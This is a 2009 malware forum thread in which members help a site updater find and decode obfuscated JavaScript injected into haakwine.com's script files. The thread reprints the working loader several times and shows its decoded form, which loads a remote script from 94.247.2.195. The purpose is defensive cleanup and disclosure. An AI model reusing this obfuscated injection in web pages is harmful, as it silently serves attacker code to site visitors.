Malware Domain List

Malware Related => Compromised Servers => Topic started by: gabbafam on April 16, 2009, 12:32:59 pm

Title: haakwine.com compromised
Post by: gabbafam on April 16, 2009, 12:32:59 pm
Hi, I am a novice user that is having the malicious site 94.247.2.195 blocked every time i access one website www.haakwine.com.  I did a yahoo search on the 94.247.2.195 and found this malware domain list and forum.  I don't know if you are the right person to post a reply to but I am really wanting to find out how to clean this off this website because i am the website updater and don't know why it is doing this.  Can you offer any help whatsoever?  I would be greatly indebted to you.
I think you could be right :( ..... the following is the uncompressed output from the PDF;

/edit

MysteryFCM: Disabled link and removed code from quoted post. Split and moved to compromised servers forum
Title: Compromised
Post by: MysteryFCM on April 16, 2009, 12:39:32 pm
I've checked the site you referenced and cannot find anything suspicious. Is this the site you are having difficulty with?

/edit

Nevermind, found it. The code is at the bottom of mm_menu.js (disable this file or replace it with a clean copy);

Code: [Select]
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
This decodes to;

Code: [Select]
<script src=//94.247.2.195/jquery.js></script>
Title: Compromised
Post by: GmG on April 16, 2009, 12:43:36 pm
There's malware script on mm_menu.js

Code: [Select]
<!--
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
 -->
Title: Compromised
Post by: MysteryFCM on April 16, 2009, 12:45:27 pm
heh yep, updated my post whilst you were posting ....
Title: Compromised
Post by: MysteryFCM on April 16, 2009, 12:47:25 pm
Script is also present in;

http://www.haakwine.com/Scripts/AC_RunActiveContent.js
Title: Re: haakwine.com compromised
Post by: SysAdMini on April 16, 2009, 01:11:28 pm
it is also present in the last line of
Code: [Select]
www.haakwine.com/mm_menu.jshttp://wepawet.cs.ucsb.edu/view.php?hash=fc23e5732b039b053d6bd7a04a30fdec&t=1239885919&type=js
Title: Re: haakwine.com compromised
Post by: gabbafam on April 16, 2009, 03:03:39 pm
I wished I knew all you all know on this forum.  I am sure this is a stupid question for you but "how do you disable a file?"  Thank you so much.
Title: Re: haakwine.com compromised
Post by: RS-232 on April 16, 2009, 03:13:31 pm
By "disable",it simply means removing the code posted above from the html/php files where it is present...

Quote
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
Title: Re: haakwine.com compromised
Post by: RS-232 on April 16, 2009, 11:11:18 pm
Speaking of it...
http://blog.scansafe.com/journal/2009/4/14/malware-manipulating-google-serps.html